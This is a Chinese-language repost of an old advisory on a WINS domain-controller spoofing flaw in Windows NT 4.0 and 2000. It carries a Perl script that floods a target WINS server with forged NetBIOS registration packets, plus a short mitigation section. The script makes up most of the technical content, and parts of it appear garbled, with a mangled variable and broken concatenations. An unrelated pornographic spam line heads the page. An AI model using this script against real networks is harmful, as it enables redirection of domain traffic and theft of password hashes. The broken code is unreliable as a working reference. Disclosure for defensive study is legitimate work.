自拍偷在线精品自拍偷,亚洲欧美中文日韩v在线观看不卡

Microsoft WINS之域控制器欺騙漏洞

運(yùn)維 系統(tǒng)運(yùn)維
本文介紹了微軟系統(tǒng)中受影響的系統(tǒng)出現(xiàn)域控制器欺騙漏洞進(jìn)行測(cè)試的方法。

Microsoft WINS之域控制器欺騙漏洞如下所述:

受影響系統(tǒng):

Microsoft Windows NT 4.0

Microsoft Windows NT 2000 Server

描述:

BUGTRAQ ID :2221

Windows Internet名字服務(wù)(WINS)隨著微軟Windows NT服務(wù)器分發(fā)。WINS負(fù)責(zé)在一個(gè)客戶-服務(wù)器的環(huán)境中將網(wǎng)絡(luò)計(jì)算機(jī)名解析為IP地址。

然而,WINS沒(méi)有正確驗(yàn)證域控制器的注冊(cè)。用戶可能修改一個(gè)域控制器的內(nèi)容,導(dǎo)致WINS服務(wù)將發(fā)往域控制器的請(qǐng)求重定向到另一個(gè)系統(tǒng)。這可能導(dǎo)致該域的網(wǎng)絡(luò)功能失效。冒牌的域控制器也可以被設(shè)置來(lái)竊取用戶名和口令的哈希值。

測(cè)試方法:

警 告

以下程序(方法)可能帶有攻擊性,僅供安全研究與教學(xué)之用。使用者風(fēng)險(xiǎn)自負(fù)!

David Byrne (dbyrne@tiaa-cref.org)提供了一個(gè)測(cè)試程序wins2.pl:

###########################################################################

 

  1. use Socket;  
  2.  
  3. $WINSAddress = "XXX.XXX.XXX.XXX"; #IP Address or Host/NetBIOS name  
  4.  
  5. $DomainName = "AAADUMMY"; #Must be all caps  
  6.  
  7. $SequenceNumber = 0x8000;  
  8.  
  9. socket(SOCKET, PF_INET, SOCK_DGRAM, getprotobyname("udp")) or die "Socket not created $!\n";  
  10.  
  11. $destAddress = inet_aton($WINSAddress);  
  12.  
  13. $destPort = sockaddr_in(137, $destAddress);  
  14.  
  15. for ($i=1;$i<=25; $i++)  
  16.  
  17. {SendRefresh ($DomainName, 0x1C, "\x0a\x6a\x00" . chr ($i))}  
  18.  
  19. sub Sequence  
  20.  
  21. {  
  22.  
  23. my ($high, $low, $str);  
  24.  
  25. $high = $SequenceNumber >> 8;  
  26.  
  27. $low = $SequenceNumber % 256;  
  28.  
  29. $SequenceNumber += 2;  
  30.  
  31. $str = chr($high) . chr ($low);  
  32.  
  33. return $str;  
  34.  
  35. }  
  36.  

 

#p#

 

  1. sub SendRelease  
  2.  
  3. {  
  4.  
  5. my ($tempname, $data);  
  6.  
  7. $tempname = NetBIOSName ($_[0], $_[1]);  
  8.  
  9. $data = Sequence () . "\x30\x00\x00\x01\x00\x00\x00\x00\x00\x01\x20" .. $tempname . "\x00\x00\x20\x00\x01\xc0\x0c\x00\x20\x00\x01\x00\x00\x00\x00\x00\x06\x20\x00" . $_[2];  
  10.  
  11. send (SOCKET, $data, 0, $destPort) == length($data) or die "Failed to send packet: $!\n";  
  12.  
  13. }  
  14.  
  15. sub SendRefresh  
  16.  
  17. {  
  18.  
  19. my ($tempname, $data);  
  20.  
  21. $tempname = NetBIOSName ($_[0], $_[1]);  
  22.  
  23. $data = Sequence () . "\x29\x00\x00\x01\x00\x00\x00\x00\x00\x01\x20" .. $tempname . "\x00\x00\x20\x00\x01\xc0\x0c\x00\x20\x00\x01\x00\x04\x93\xe0\x00\x06\xe0\x00" . $_[2];  
  24.  
  25. send (SOCKET, $data, 0, $destPort) == length($data) or die "Failed to send packet: $!\n";  
  26.  
  27. }  
  28.  
  29. sub NetBIOSName  
  30.  
  31. {  
  32.  
  33. my ($c, $ord, $high, $low, $tempname);  
  34.  
  35. while ($_[0] =~ /(.)/g)  
  36.  
  37. {  
  38.  
  39. $c++;  
  40.  
  41. $ordord = ord ($1);  
  42.  
  43. $high = $ord >> 4;  
  44.  
  45. $low = $ord % 16;  
  46.  
  47. $tempname .chr($high +65) . chr($low +65);  
  48.  
  49. }  
  50.  
  51. for (;$c<15;$c++)  
  52.  
  53. {$tempname ."\x43\x41"}  
  54.  
  55. $high = $_[1] >> 4;  
  56.  
  57. $low = $_[1] % 16;  
  58.  
  59. $tempname .chr($high +65) . chr($low +65);  
  60.  
  61. return $tempname;  
  62.  
  63. }  
  64.  

 

建議:

臨時(shí)解決方法:

NSFOCUS建議您采用David Byrne提供的臨時(shí)解決方法:對(duì)于敏感信息,采用靜態(tài)記錄。并在防火墻的DMZ區(qū)封鎖NetBIOS服務(wù)。

Microsoft WINS域控制器欺騙漏洞的介紹希望能夠?qū)ψx者有所幫助。

【編輯推薦】

  1. 域控制器遷移的方法
  2. 域控制器降級(jí)基礎(chǔ)知識(shí)
  3. 域控制器千萬(wàn)別忽視DNS設(shè)置
  4. 域控制器的安裝及降級(jí)的方法
  5. windows2003域控制器升級(jí)和降級(jí)的圖文教程
責(zé)任編輯:韓亞珊 來(lái)源: 比特網(wǎng)
相關(guān)推薦

2011-07-12 09:29:10

主域控制器備份域控制器

2011-07-13 10:29:44

域控制器

2011-07-14 10:28:54

額外域控制器

2011-07-08 17:58:56

域控制器

2011-07-18 14:17:07

域控制器組策略OU

2011-07-12 09:58:42

主域控制器備份域控制器

2022-02-10 16:43:35

汽車智能芯片

2011-07-07 17:15:52

2011-07-18 13:55:08

2011-07-07 15:01:02

2011-07-07 09:10:17

域控制器降級(jí)Active Dire

2011-07-13 13:13:10

域控制器活動(dòng)目錄

2011-07-08 13:56:00

域控制器服務(wù)器

2011-07-14 08:49:16

域控制器

2011-07-13 10:56:04

2011-07-13 10:01:16

域控制器

2011-07-18 16:11:32

域控制器

2011-07-28 10:38:35

域控制器

2011-07-13 09:00:59

域控制器Active Dire

2011-07-20 09:01:33

域控制器ntp服務(wù)器
點(diǎn)贊
收藏

51CTO技術(shù)棧公眾號(hào)